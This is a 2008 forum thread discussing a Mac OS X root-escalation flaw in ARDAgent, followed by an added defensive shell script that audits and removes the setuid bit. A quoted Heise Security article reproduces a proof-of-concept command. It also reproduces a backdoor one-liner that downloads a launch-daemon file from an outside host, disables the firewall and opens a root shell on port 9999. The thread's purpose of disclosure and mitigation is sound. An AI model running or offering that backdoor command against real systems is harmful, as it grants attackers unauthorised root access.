Free Republic
General/Chat

To: Swordmaker

Don’t they mean that you should *disable* the function?

Also, RM is turned off by default in a Leopard install.


11 posted on 06/20/2008 10:43:04 PM PDT by Spktyr (Overwhelmingly superior firepower and the willingness to use it is the only proven peace solution.)


To: Spktyr
Don’t they mean that you should *disable* the function?

Nope... It seems that it must be enabled for it to be non-modifiable.

Activating Remote Management, moving the location of ARDAgent, compressing it in a ZIP file, or deleting the User ID for ARDAgent are apparently all cures for this particular vulnerability.

13 posted on 06/20/2008 10:54:29 PM PDT by Swordmaker (Remember, the proper pronunciation of IE is "AAAAIIIIIEEEEEEE!")

To: Spktyr
I've been reading over the thread at ShadowMac that seems to be the source of this tempest in a teapot. . . They are making jokes about it. . . and tossing code examples back and forth. Sprinkled in amongst all that are comments like "I can't get it to work" and "I wish I had a Mac so I could test it" and "It won't do this" and "It won't do that."

One participant said yesterday:

"well I suppose I should write my own little trojan so I can get famous too! — Famous... I don't even think 100 sites have this posted. No one has received recognition from outside sources, the most I heard was "bunch of kids." No one released it so the press will die off in a couple of days. So in summary no ones famous, but if you guys want to release a worm/trojan/whatever and get busted go ahead."

It looks to me as if this is another flash-in-the-pan attempt at exploiting an announced vulnerability without a means of vectoring it besides psychological engineering (convincing stupid users to download it and run it). At this point, the "Trojan" exists only as an AppleScript on some hacker sites, with no attempt at releasing it.

14 posted on 06/20/2008 11:10:48 PM PDT by Swordmaker (Remember, the proper pronunciation of IE is "AAAAIIIIIEEEEEEE!")

To: Spktyr
Information from Heise-online.co.uk.


20 June 2008, 11:58

Root exploit for Mac OS X

A vulnerability in Mac OS X 10.4 and 10.5 makes it easy for potential attackers to obtain root rights to a system. The ARDAgent – Apple Remote Desktop – part of Remote Management has the SUID bit set. ARDAgent is able to run AppleScript with root rights and these, in turn, may contain shell commands – all without requiring a password.

To demonstrate the problem as a standard user or guest on a computer, type the following into the console:

osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

Physical access to a system is not required for an attack to be successful. In principle, the exploit will also work remotely, say on a server on which a user has a restricted account with SSH access.

A suggestion of how this could be exploited to implement a backdoor has already been posted on Slashdot. When tested at heise Security, the line:

osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl "'

opened a root shell at TCP port 9999.

Several ways to solve the problem have now been suggested. The exploit doesn't work if the "Remote Management" option is enabled under Mac OS X 10.5 "System Settings/Sharing/" – but this is not the default setting. Neither does it work if the Apple Remote Desktop client has been installed and enabled under Mac OS X 10.4. Other suggestions are to completely remove the Apple Remote Desktop, to compress the file, or to delete the SUID bit in ARDAgent:

chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

15 posted on 06/20/2008 11:22:36 PM PDT by Swordmaker
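The two posts above (the list of "cures" in post 13 and the Heise write-up in post 15) describe the same three things: ARDAgent carries the setuid bit, the "whoami" one-liner proves whether it runs as root, and chmod u-s removes the bit. The script below is an added example, not code from the thread or from Heise, that turns those into a repeatable check. The ARDAgent path is the one quoted in the article; the function names and the "audit" argument are this example's own. The probe only ever asks for "whoami", so it is a read-only test, and it reports "n/a" on any host without osascript.

```shell
#!/bin/sh
# Added example: audit and remediate the ARDAgent setuid exposure discussed
# in the thread. Path from the Heise text; function names are assumptions.

ARDAGENT="/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent"

# setuid_state PATH
#   Prints "setuid", "clean" or "missing" and returns 0, 1 or 2 respectively.
#   [ -u ] is the POSIX test for the setuid mode bit; it needs no privileges,
#   so an unprivileged user can run this against the root-owned binary.
setuid_state() {
    if [ ! -e "$1" ]; then
        echo missing
        return 2
    fi
    if [ -u "$1" ]; then
        echo setuid
        return 0
    fi
    echo clean
    return 1
}

# strip_setuid PATH
#   The mitigation from the article: drop the bit with chmod u-s. Needs write
#   permission on the file (root for the real ARDAgent). Succeeds only if the
#   bit is verified gone afterwards, not merely because chmod returned 0.
strip_setuid() {
    chmod u-s "$1" || return 1
    [ ! -u "$1" ]
}

# probe_root_shell
#   The article's proof of concept: ask ARDAgent to run "whoami" through
#   AppleScript. Prints the user the command ran as, or "n/a" when osascript
#   is absent (any non-Mac host) or the call fails. Returns 0 only when the
#   answer is "root", i.e. the machine is exploitable as described.
probe_root_shell() {
    if ! command -v osascript >/dev/null 2>&1; then
        echo n/a
        return 1
    fi
    who=$(osascript -e 'tell app "ARDAgent" to do shell script "whoami"' 2>/dev/null)
    echo "${who:-n/a}"
    [ "$who" = "root" ]
}

# audit_ardagent PATH
#   Human-readable summary of both checks for one binary.
audit_ardagent() {
    printf 'binary:      %s\n' "$1"
    printf 'mode:        %s\n' "$(setuid_state "$1")"
    printf 'PoC ran as:  %s\n' "$(probe_root_shell)"
}

# Only act when invoked as "sh ardagent_check.sh audit"; otherwise the file
# just defines the functions so they can be sourced from another script.
if [ "${1:-}" = "audit" ]; then
    audit_ardagent "$ARDAGENT"
fi
```

Run it as `sh ardagent_check.sh audit` on the Mac in question; a line reading `mode: setuid` together with `PoC ran as: root` is the condition the article describes, and `sudo sh -c '. ./ardagent_check.sh; strip_setuid "$ARDAGENT"'` applies the chmod fix with verification. Note that the check only looks at the mode bit, so a machine "cured" by enabling Remote Management, as post 13 and the article suggest, still shows `mode: setuid`; the probe line is what tells the two apart.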


FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson